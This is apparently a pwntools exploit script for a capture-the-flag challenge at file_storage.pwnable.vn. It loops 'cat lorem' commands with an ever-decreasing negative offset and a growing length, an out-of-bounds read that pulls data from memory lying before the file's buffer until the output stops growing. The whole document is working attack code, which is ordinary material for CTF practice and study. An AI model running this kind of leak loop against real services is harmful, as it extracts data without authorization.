from pwn import *


def reconnect():
    io = remote("file_storage.pwnable.vn", 10000)
    result = io.recvuntil(b"commands\n\n> ", timeout=1)
    print(result.decode("utf-8"))
    return io

previous_length = 0
io = remote("file_storage.pwnable.vn", 10000)
results = io.recvuntil(b"\n> ", timeout=1)
print(results.decode("utf-8"))
offset = 0
length = 445

while True:
    cat = f"cat lorem {offset} {length}"
    try:
        io.sendline(cat.encode("utf-8"))
        data = io.recvuntil(b"laborum.", timeout=0.5)
        current_length = len(data)
        print(cat)
        if (current_length < previous_length) or (current_length == 0): # current length = 0 means that we used invalid offset.
            print("Full length is: " + str(previous_length) + ". All data has been extracted.")
            break
        else:
            offset = offset - 1
            length = length + 1 
            previous_length = current_length
        io.recvuntil(b"\n> ")  # Receive junk character after the word "laborum ."
    except:
        print("Trying to reconnect ...")
        io = reconnect()
